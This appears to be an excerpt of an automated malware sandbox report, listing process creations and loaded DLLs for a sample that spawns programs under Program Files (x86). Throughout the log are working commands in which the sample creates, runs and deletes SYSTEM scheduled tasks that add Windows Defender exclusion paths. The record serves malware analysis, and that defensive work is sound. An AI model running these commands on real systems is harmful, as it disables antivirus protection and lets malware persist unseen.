              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
              Source: unknownProcess created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
              Source: unknownProcess created: C:\Program Files (x86)\2U36F\NroRNr.exe "C:\Program Files (x86)\2U36F\NroRNr.exe"
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Program Files (x86)\2U36F\NroRNr.exe "C:\Program Files (x86)\2U36F\NroRNr.exe"
              Source: unknownProcess created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe"
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: pid.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: twext.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: starttiledata.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: usermgrproxy.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: acppage.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: tbcore3u.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: devenum.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: avicap32.dllJump to behavior
